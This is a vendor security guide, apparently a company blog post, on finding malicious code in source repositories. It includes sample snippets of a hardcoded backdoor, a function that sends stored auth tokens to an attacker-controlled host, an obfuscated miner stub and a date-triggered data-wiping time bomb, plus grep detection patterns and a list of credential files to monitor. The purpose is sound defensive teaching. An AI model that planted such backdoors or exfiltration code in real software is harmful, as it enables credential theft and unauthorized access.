How to Detect Malicious Source Code in Your Codebase

Malicious code in a software project doesn’t always arrive through external attackers exploiting vulnerabilities. It can be introduced by a compromised dependency, a malicious contributor, a supply chain attack on your build toolchain, or an insider threat. Once inside, it often runs with the same privileges as your legitimate application — making it extremely dangerous and hard to detect.

This guide covers the techniques used to systematically identify malicious code in source repositories.

What Malicious Source Code Looks Like

Malicious code inserted into a codebase typically falls into one of these categories:

1. Backdoors

Hidden functionality that allows unauthorized access, often disguised as legitimate feature code:

# Disguised as "debug mode" but activates on a specific token
def authenticate(user, password, debug_token=None):
    if debug_token == "4x7k-internal-2024":  # ← Hardcoded backdoor
        return True
    return check_password(user, password)

2. Data Exfiltration

Code that silently sends sensitive data to an external endpoint:

// Hidden in a legitimate-looking analytics helper
function trackPageView(page) {
  // Legitimate tracking...
  fetch('https://analytics.example.com/track', { body: JSON.stringify({ page }) });

  // Malicious: also exfiltrates auth tokens
  const token = localStorage.getItem('auth_token');
  if (token) {
    fetch('https://attacker-controlled.net/collect', {
      method: 'POST',
      body: token
    });
  }
}

3. Cryptominers

CPU-intensive code embedded to mine cryptocurrency using your users’ or servers’ resources:

// Often obfuscated or loaded from an external script tag
const _0x4f2a = ['WebAssembly', 'instantiateStreaming'];
// ... heavily obfuscated miner code

4. Supply Chain Injections

Malicious code injected into a third-party package that your project depends on. The SolarWinds breach and the event-stream npm package incident are canonical examples.

5. Time-Bombed or Trigger-Based Code

// Only executes on a specific date or condition
public void process(Request req) {
    Calendar c = Calendar.getInstance();
    if (c.get(Calendar.MONTH) == 11 && c.get(Calendar.DAY_OF_MONTH) == 31) {
        // Destructive payload executed on Dec 31
        deleteAllRecords();
        return;
    }
    normalProcess(req);
}

Detection Method 1: Static Analysis (SAST) with Malware Signatures

A SAST tool with malware detection capability scans source code for known malicious patterns:

Hardcoded IP addresses or domains in non-configuration files
Encoded/obfuscated strings (base64, hex encoding, eval of dynamic strings)
Unusual network calls to non-whitelisted domains
Deletion or encryption of files outside expected scope
Access to sensitive system files (/etc/passwd, registry keys)
Cryptocurrency mining APIs or WebAssembly blobs

Offensive360’s SAST engine includes dedicated malware pattern analysis that scans for these indicators across all supported languages.

Detection Method 2: Git History Analysis

Malicious code often enters through a specific commit. Audit your git history for:

# Find commits that added external URLs or IPs
git log -p --all | grep -E "(http[s]?://|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})"

# Find commits that added base64-looking strings
git log -p --all | grep -E "[A-Za-z0-9+/]{40,}={0,2}"

# Commits from unexpected contributors
git log --all --format='%H %ae %s' | sort -k2

# Large binary blobs added to the repo
git log --all --diff-filter=A -- "*.bin" "*.wasm" "*.dll"

Red flags in git history:

A commit that modifies an unrelated file alongside legitimate changes
A contributor account that was recently created or has no prior activity
A commit at an unusual time (3am in a different timezone)
A commit that modifies build scripts, CI configuration, or package lock files

Detection Method 3: Dependency Scanning (SCA)

Most supply chain attacks come through dependencies, not direct code changes. Scan every dependency for known malicious packages:

# npm
npm audit
npx is-website-vulnerable

# Python
pip-audit

# Ruby
bundle audit

# .NET
dotnet list package --vulnerable

Beyond known CVEs — look for:

Packages with very new versions that suddenly modify network behavior
Packages where the maintainer account changed hands recently
Typosquatting: lodash vs 1odash, express vs expres
Packages with install scripts (preinstall, postinstall) that make network calls

Detection Method 4: Code Review Checklists

When reviewing code (especially from external contributors or after a dependency update), look for:

Network activity:

Are all outbound network calls to known, approved endpoints?
Is there any fetch/HTTP call that doesn’t have a corresponding feature requirement?
Are URLs or IPs hardcoded instead of loaded from configuration?

Obfuscation:

Is there any eval(), exec(), os.system(), or dynamic code execution?
Are there long base64-encoded strings not related to legitimate assets?
Is there code that decodes and executes a string at runtime?

Data access:

Does this code access environment variables, tokens, or secrets?
Is it reading files outside the expected application scope?
Does it access the clipboard, cookies, or local storage for no stated reason?

Conditional execution:

Is there any logic that only triggers on specific dates, system states, or input values?
Are there commented-out blocks with suspicious-looking code?

Detection Method 5: Runtime Monitoring

Even with thorough static analysis, some malicious code only activates at runtime. Supplement static detection with:

Outbound network monitoring: Alert on any process making network calls to domains not on a whitelist
File system auditing: Monitor for reads of /etc/shadow, ~/.ssh/id_rsa, credential files
Process monitoring: Alert on unexpected child processes spawned by your application
Memory scanning: Detect in-memory code injection or shellcode execution

Tools: Falco (Kubernetes), auditd (Linux), Windows Defender ATP, eBPF-based monitoring.

High-Risk Entry Points to Monitor

Entry Point	Risk	Mitigation
Open-source dependencies	Supply chain injection	SCA scanning + lockfile pinning
CI/CD pipeline actions	Malicious GitHub Actions	Pin action versions to commit hash
Docker base images	Trojaned images	Use verified official images + scan
External contributors	Direct code injection	Mandatory code review + SAST gate
Build toolchain	Compiler/toolchain compromise	Verify checksums, use reproducible builds
Package registries	Typosquatting, account takeover	Dependency pinning, audit new versions

Indicators of Compromise in Source Code

Look for these specific patterns regardless of language:

# Suspicious patterns to search for
grep -rn "eval\|exec\|system\|shell_exec\|base64_decode" src/
grep -rn "http[s]\?://[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+" src/  # IP-based URLs
grep -rn "atob\|btoa\|fromCharCode" src/
grep -rn "process.env\." src/ | grep -v ".config\." | grep -v "test"

Building a Malicious Code Detection Pipeline

For ongoing protection, integrate detection into your development lifecycle:

Pre-commit hooks — Git hooks to block obvious malicious patterns (hardcoded secrets, suspicious evals) before commit
CI/CD SAST gate — Full static analysis + malware scan on every PR
Dependency update monitoring — Automated SCA on every dependency change
Periodic full-repo scans — Weekly SAST scan of the entire codebase, not just diffs
Incident response plan — Defined process for when malicious code is detected

Offensive360 SAST includes dedicated malware and backdoor detection alongside standard vulnerability scanning. Scan your codebase now or book a demo to see the malware analysis engine in action.